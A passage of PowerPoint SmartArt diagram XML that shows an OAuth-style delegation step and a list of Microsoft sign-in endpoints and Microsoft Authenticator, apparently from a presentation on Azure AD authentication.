          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2211D20C-7555-4DF6-84ED-2B7D4A6C0A4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>3: App receives a magic delegation token and access resource on User’s behalf</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB158747-219A-44A3-BB71-CB3A0F893720}" type="parTrans" cxnId="{7CECF116-6659-4643-B30C-5F2A26CB22A9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87DA4BCE-6F44-43CB-8BAB-4C20BB8304BF}" type="sibTrans" cxnId="{7CECF116-6659-4643-B30C-5F2A26CB22A9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" type="pres">
      <dgm:prSet presAssocID="{3F36EACC-40A0-467F-8E0A-C2900A1A4F15}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF97E761-ED8A-42D1-88A4-171BA13E7921}" type="pres">
      <dgm:prSet presAssocID="{CD78AD31-3DD7-454E-BE08-FE28C54A0E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831DB1-17A7-4B06-A557-B485412063FD}" type="pres">
      <dgm:prSet presAssocID="{2439BAE7-E48D-48E5-B968-6DE28C462B81}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53E20593-A6D6-4A1E-A82D-FD89DB236E3A}" type="pres">
      <dgm:prSet presAssocID="{7179F809-BE81-49E6-80BC-C49128CA7C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BE3FB3-B50D-4CB0-AA4B-0DD468E43BCE}" type="pres">
      <dgm:prSet presAssocID="{7179F809-BE81-49E6-80BC-C49128CA7CE4}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2CA924AA-3EF8-49B1-8102-0E213F488B94}" type="pres">
      <dgm:prSet presAssocID="{2211D20C-7555-4DF6-84ED-2B7D4A6C0A4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ECF116-6659-4643-B30C-5F2A26CB22A9}" srcId="{3F36EACC-40A0-467F-8E0A-C2900A1A4F15}" destId="{2211D20C-7555-4DF6-84ED-2B7D4A6C0A4C}" srcOrd="2" destOrd="0" parTransId="{EB158747-219A-44A3-BB71-CB3A0F893720}" sibTransId="{87DA4BCE-6F44-43CB-8BAB-4C20BB8304BF}"/>
    <dgm:cxn modelId="{5F04762A-6032-4635-A9C6-2AF68BD44912}" srcId="{3F36EACC-40A0-467F-8E0A-C2900A1A4F15}" destId="{CD78AD31-3DD7-454E-BE08-FE28C54A0E3E}" srcOrd="0" destOrd="0" parTransId="{2FAA03EF-965D-4F56-B24F-645DCCDA7713}" sibTransId="{2439BAE7-E48D-48E5-B968-6DE28C462B81}"/>
    <dgm:cxn modelId="{2F47A95B-A06B-4F5E-BA90-D2E9EA501730}" type="presOf" srcId="{3F36EACC-40A0-467F-8E0A-C2900A1A4F15}" destId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{42948675-078D-4015-A8CD-49894BB3CD57}" type="presOf" srcId="{CD78AD31-3DD7-454E-BE08-FE28C54A0E3E}" destId="{DF97E761-ED8A-42D1-88A4-171BA13E7921}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1900787F-CE9A-4827-9F5D-3219EF9F967E}" srcId="{3F36EACC-40A0-467F-8E0A-C2900A1A4F15}" destId="{7179F809-BE81-49E6-80BC-C49128CA7CE4}" srcOrd="1" destOrd="0" parTransId="{9E5C8EE9-618D-4B30-BE13-584C1EF547AC}" sibTransId="{00EEA71D-B98C-4418-92CD-10977E881166}"/>
    <dgm:cxn modelId="{F6E7B083-2335-43D8-895D-22E43EDCBEB1}" type="presOf" srcId="{7179F809-BE81-49E6-80BC-C49128CA7CE4}" destId="{53E20593-A6D6-4A1E-A82D-FD89DB236E3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{91270DC6-001A-486D-AEB5-EF3C73BF2F75}" srcId="{7179F809-BE81-49E6-80BC-C49128CA7CE4}" destId="{F1F8DFDC-7BCB-41BB-AF43-408135C08E50}" srcOrd="0" destOrd="0" parTransId="{681B0733-4880-4468-A644-B22AF7EC65FA}" sibTransId="{A6498093-673E-4338-A4DE-460C9A4DAF8B}"/>
    <dgm:cxn modelId="{7A5D25D8-697E-4553-B77A-D19889E222A9}" type="presOf" srcId="{F1F8DFDC-7BCB-41BB-AF43-408135C08E50}" destId="{4CBE3FB3-B50D-4CB0-AA4B-0DD468E43BCE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CE9DF6EF-20D0-44FF-9384-B444A6F0A602}" type="presOf" srcId="{2211D20C-7555-4DF6-84ED-2B7D4A6C0A4C}" destId="{2CA924AA-3EF8-49B1-8102-0E213F488B94}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4877D43D-D1BC-4AAD-9277-0515A7875909}" type="presParOf" srcId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" destId="{DF97E761-ED8A-42D1-88A4-171BA13E7921}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA3728F1-7393-4D0F-9F85-678E46609BCF}" type="presParOf" srcId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" destId="{A8831DB1-17A7-4B06-A557-B485412063FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8D28DEA0-AFA7-4BA6-BB24-80DE2F1131FD}" type="presParOf" srcId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" destId="{53E20593-A6D6-4A1E-A82D-FD89DB236E3A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{94F2797A-9FEA-4AC0-938A-8DC50D2992A3}" type="presParOf" srcId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" destId="{4CBE3FB3-B50D-4CB0-AA4B-0DD468E43BCE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6993DFAA-810F-4EFF-8A3C-7A2FD7A73B40}" type="presParOf" srcId="{5E9F62F3-6031-4F5C-ACF8-FB7E98863149}" destId="{2CA924AA-3EF8-49B1-8102-0E213F488B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D9C61FD-91BD-4D59-9D55-CF4DE2AD6A0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DEA887B-D727-463C-B6D2-DF57EBC458ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>login.windows.net</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CE5DDB8-EF46-498F-939F-CD14C037DB80}" type="parTrans" cxnId="{48B896B5-D1E5-43AC-89B1-52EFBE1A7691}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{505571DA-22BB-4C67-9ACD-157D51B3E49F}" type="sibTrans" cxnId="{48B896B5-D1E5-43AC-89B1-52EFBE1A7691}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BF90CD4-B562-440B-9F90-DD1464FA6E9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>login.microsoftonline.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED3F4A49-361A-4FBD-A5B0-6B6BD704C8E8}" type="parTrans" cxnId="{E2A5DAB0-45C5-4477-AF3F-DB4728537B99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49325954-9474-4BDC-8A28-4ADC76E8D507}" type="sibTrans" cxnId="{E2A5DAB0-45C5-4477-AF3F-DB4728537B99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE220026-D2DA-4CD0-B675-835B92C7A2ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>login.live.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABF26EA1-1A9C-4B16-A559-28AC50D1F041}" type="parTrans" cxnId="{AAD4CD3A-08CE-415C-845F-5E1AF9433F3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E13FDB57-B358-4527-90D7-9162A9125A7E}" type="sibTrans" cxnId="{AAD4CD3A-08CE-415C-845F-5E1AF9433F3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{012262CE-4E19-4A36-AAED-F2C8ED18878A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>account.live.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DFB6A7A-735E-4D60-A14E-3270EE4B00D9}" type="parTrans" cxnId="{2293ACEB-A967-417C-A3CF-099E49A765C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{536193F3-FE26-4900-88F5-3F8B63B7C4E7}" type="sibTrans" cxnId="{2293ACEB-A967-417C-A3CF-099E49A765C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62AFFE9B-8040-4395-942F-B757E6D254BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>account.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{072B4329-249E-4BAA-B459-5CDF9CDF602B}" type="parTrans" cxnId="{561E5F4A-4E38-476B-BCD4-DBF2C9F55DD6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25D68BBF-5C07-4D55-8CD0-567523863925}" type="sibTrans" cxnId="{561E5F4A-4E38-476B-BCD4-DBF2C9F55DD6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1D60289-F05F-4834-A5C8-656008634CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>account.activedirectory.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55480F0B-E0B8-436D-A0A9-0CCF874234CB}" type="parTrans" cxnId="{06F13C0E-176E-41B9-9072-EC5F44F72469}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47F7FC61-7291-4488-8D14-ECF9C0328A9B}" type="sibTrans" cxnId="{06F13C0E-176E-41B9-9072-EC5F44F72469}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA5FBCF6-5685-42C7-B7D5-590E2515BBCE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>credential.activedirectory.windowsazure.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E26BF1B-F2DE-4B4A-8872-391067267918}" type="parTrans" cxnId="{6DC77560-71D0-4E18-BA95-6D4CA60903E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C208C6C-B25E-4487-AB2F-3DF31DB955CB}" type="sibTrans" cxnId="{6DC77560-71D0-4E18-BA95-6D4CA60903E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{914738F7-AC7F-4DBB-8060-F567A865D343}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>portal.office.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DC6B0E2-D909-4BE4-A670-29406BA45824}" type="parTrans" cxnId="{9A497343-A259-45E6-BF23-B2639903EEB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CACCDF7-B9F3-4DCE-8979-B631BABDD5A3}" type="sibTrans" cxnId="{9A497343-A259-45E6-BF23-B2639903EEB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAC0DB36-A501-4F9D-9B38-5D87663473A9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>passwordreset.microsoftonline.com</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4A229DF-1D47-4FE4-B4AE-74A5916D97C5}" type="parTrans" cxnId="{EBCEE117-05C3-4B4B-8E71-7AF39EC8AD4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6E54C88-2CFC-4EC5-BEA2-FF4E6D48E3B0}" type="sibTrans" cxnId="{EBCEE117-05C3-4B4B-8E71-7AF39EC8AD4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E132A39-3A0F-463C-B9D2-37708F071C0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Microsoft Authenticator (iOS and Android applications)* </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DBA5F88-C222-4465-B335-7651BF9097EE}" type="parTrans" cxnId="{239725BB-1179-4191-9387-42636ECE1ECF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B69B3EC3-6AFC-4F1E-99D5-5C3A1E19BD44}" type="sibTrans" cxnId="{239725BB-1179-4191-9387-42636ECE1ECF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" type="pres">
      <dgm:prSet presAssocID="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B142B52B-C21C-4CE8-9A13-EB0D97E81E2A}" type="pres">
      <dgm:prSet presAssocID="{ADEA887B-D727-463C-B6D2-DF57EBC458E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91F1403D-6F37-4DCE-8F44-C25ED7416196}" type="pres">
      <dgm:prSet presAssocID="{505571DA-22BB-4C67-9ACD-157D51B3E49F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A70D02A2-4EAD-4ED9-9245-3523013A27A4}" type="pres">
      <dgm:prSet presAssocID="{7BF90CD4-B562-440B-9F90-DD1464FA6E9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185AC4F1-178F-4CA2-A682-9382DD2E199B}" type="pres">
      <dgm:prSet presAssocID="{49325954-9474-4BDC-8A28-4ADC76E8D507}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B2EA5D1-6A55-4120-8EFE-55F678EB0460}" type="pres">
      <dgm:prSet presAssocID="{CE220026-D2DA-4CD0-B675-835B92C7A2ED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2ED3C05C-B75B-4382-BBE5-A241F607CA42}" type="pres">
      <dgm:prSet presAssocID="{E13FDB57-B358-4527-90D7-9162A9125A7E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8AE191CF-738F-4394-B892-4889656B4E6B}" type="pres">
      <dgm:prSet presAssocID="{012262CE-4E19-4A36-AAED-F2C8ED18878A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AF729B40-6953-4B5C-B31F-BE299A2A436F}" type="pres">
      <dgm:prSet presAssocID="{536193F3-FE26-4900-88F5-3F8B63B7C4E7}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3164AFEA-44ED-4F3F-A28D-69DAE11CEE64}" type="pres">
      <dgm:prSet presAssocID="{62AFFE9B-8040-4395-942F-B757E6D254B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52AC061-5FD9-494C-99AF-AB17CF969483}" type="pres">
      <dgm:prSet presAssocID="{25D68BBF-5C07-4D55-8CD0-567523863925}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C96BD6A-922B-492E-9BAF-1F2C6E4E8DFE}" type="pres">
      <dgm:prSet presAssocID="{C1D60289-F05F-4834-A5C8-656008634CB5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1BA12E59-525E-4C01-BFE4-CEA218895137}" type="pres">
      <dgm:prSet presAssocID="{47F7FC61-7291-4488-8D14-ECF9C0328A9B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14A0AD6D-2E15-4748-A301-47CF80AC7D56}" type="pres">
      <dgm:prSet presAssocID="{BA5FBCF6-5685-42C7-B7D5-590E2515BBCE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35F9C064-F2F7-48EE-ADB5-96985ADE5156}" type="pres">
      <dgm:prSet presAssocID="{5C208C6C-B25E-4487-AB2F-3DF31DB955CB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{636FD81F-F12E-4637-BEA5-CD949136F053}" type="pres">
      <dgm:prSet presAssocID="{914738F7-AC7F-4DBB-8060-F567A865D343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BE6CA124-89CA-4B70-9CCA-058996FF38E9}" type="pres">
      <dgm:prSet presAssocID="{9CACCDF7-B9F3-4DCE-8979-B631BABDD5A3}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7CC3005C-8042-45C4-B29B-C9213E3F5810}" type="pres">
      <dgm:prSet presAssocID="{EAC0DB36-A501-4F9D-9B38-5D87663473A9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23E31401-AA30-4B0E-BC5C-5CD6B623855F}" type="pres">
      <dgm:prSet presAssocID="{B6E54C88-2CFC-4EC5-BEA2-FF4E6D48E3B0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39FE06F5-6607-41BE-80F5-8793E0934237}" type="pres">
      <dgm:prSet presAssocID="{9E132A39-3A0F-463C-B9D2-37708F071C0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6F13C0E-176E-41B9-9072-EC5F44F72469}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{C1D60289-F05F-4834-A5C8-656008634CB5}" srcOrd="5" destOrd="0" parTransId="{55480F0B-E0B8-436D-A0A9-0CCF874234CB}" sibTransId="{47F7FC61-7291-4488-8D14-ECF9C0328A9B}"/>
    <dgm:cxn modelId="{06F09E12-0B16-44E5-B20B-95A8E7EE7571}" type="presOf" srcId="{012262CE-4E19-4A36-AAED-F2C8ED18878A}" destId="{8AE191CF-738F-4394-B892-4889656B4E6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E1351713-1E22-4D73-B703-DE279A5A6F68}" type="presOf" srcId="{62AFFE9B-8040-4395-942F-B757E6D254BC}" destId="{3164AFEA-44ED-4F3F-A28D-69DAE11CEE64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EBCEE117-05C3-4B4B-8E71-7AF39EC8AD4C}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{EAC0DB36-A501-4F9D-9B38-5D87663473A9}" srcOrd="8" destOrd="0" parTransId="{C4A229DF-1D47-4FE4-B4AE-74A5916D97C5}" sibTransId="{B6E54C88-2CFC-4EC5-BEA2-FF4E6D48E3B0}"/>
    <dgm:cxn modelId="{AD93C433-22CF-496C-BE43-66F1986005B6}" type="presOf" srcId="{CE220026-D2DA-4CD0-B675-835B92C7A2ED}" destId="{8B2EA5D1-6A55-4120-8EFE-55F678EB0460}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0720CB33-EE1E-435B-80FA-44774F103310}" type="presOf" srcId="{914738F7-AC7F-4DBB-8060-F567A865D343}" destId="{636FD81F-F12E-4637-BEA5-CD949136F053}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AAD4CD3A-08CE-415C-845F-5E1AF9433F3A}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{CE220026-D2DA-4CD0-B675-835B92C7A2ED}" srcOrd="2" destOrd="0" parTransId="{ABF26EA1-1A9C-4B16-A559-28AC50D1F041}" sibTransId="{E13FDB57-B358-4527-90D7-9162A9125A7E}"/>
    <dgm:cxn modelId="{6DC77560-71D0-4E18-BA95-6D4CA60903E6}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{BA5FBCF6-5685-42C7-B7D5-590E2515BBCE}" srcOrd="6" destOrd="0" parTransId="{9E26BF1B-F2DE-4B4A-8872-391067267918}" sibTransId="{5C208C6C-B25E-4487-AB2F-3DF31DB955CB}"/>
    <dgm:cxn modelId="{9A497343-A259-45E6-BF23-B2639903EEB6}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{914738F7-AC7F-4DBB-8060-F567A865D343}" srcOrd="7" destOrd="0" parTransId="{5DC6B0E2-D909-4BE4-A670-29406BA45824}" sibTransId="{9CACCDF7-B9F3-4DCE-8979-B631BABDD5A3}"/>
    <dgm:cxn modelId="{1539374A-B7E0-4F17-B008-700AA5F97676}" type="presOf" srcId="{7BF90CD4-B562-440B-9F90-DD1464FA6E9A}" destId="{A70D02A2-4EAD-4ED9-9245-3523013A27A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{561E5F4A-4E38-476B-BCD4-DBF2C9F55DD6}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{62AFFE9B-8040-4395-942F-B757E6D254BC}" srcOrd="4" destOrd="0" parTransId="{072B4329-249E-4BAA-B459-5CDF9CDF602B}" sibTransId="{25D68BBF-5C07-4D55-8CD0-567523863925}"/>
    <dgm:cxn modelId="{051F9E83-A538-4773-81E8-92DF3905DCB0}" type="presOf" srcId="{BA5FBCF6-5685-42C7-B7D5-590E2515BBCE}" destId="{14A0AD6D-2E15-4748-A301-47CF80AC7D56}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{572CFAA3-CC32-45D4-9C3F-1FCE21B79A83}" type="presOf" srcId="{ADEA887B-D727-463C-B6D2-DF57EBC458ED}" destId="{B142B52B-C21C-4CE8-9A13-EB0D97E81E2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E2A5DAB0-45C5-4477-AF3F-DB4728537B99}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{7BF90CD4-B562-440B-9F90-DD1464FA6E9A}" srcOrd="1" destOrd="0" parTransId="{ED3F4A49-361A-4FBD-A5B0-6B6BD704C8E8}" sibTransId="{49325954-9474-4BDC-8A28-4ADC76E8D507}"/>
    <dgm:cxn modelId="{48B896B5-D1E5-43AC-89B1-52EFBE1A7691}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{ADEA887B-D727-463C-B6D2-DF57EBC458ED}" srcOrd="0" destOrd="0" parTransId="{6CE5DDB8-EF46-498F-939F-CD14C037DB80}" sibTransId="{505571DA-22BB-4C67-9ACD-157D51B3E49F}"/>
    <dgm:cxn modelId="{18233DB6-5219-4E9A-81DB-91A3B7CFB619}" type="presOf" srcId="{C1D60289-F05F-4834-A5C8-656008634CB5}" destId="{3C96BD6A-922B-492E-9BAF-1F2C6E4E8DFE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{239725BB-1179-4191-9387-42636ECE1ECF}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{9E132A39-3A0F-463C-B9D2-37708F071C0D}" srcOrd="9" destOrd="0" parTransId="{4DBA5F88-C222-4465-B335-7651BF9097EE}" sibTransId="{B69B3EC3-6AFC-4F1E-99D5-5C3A1E19BD44}"/>
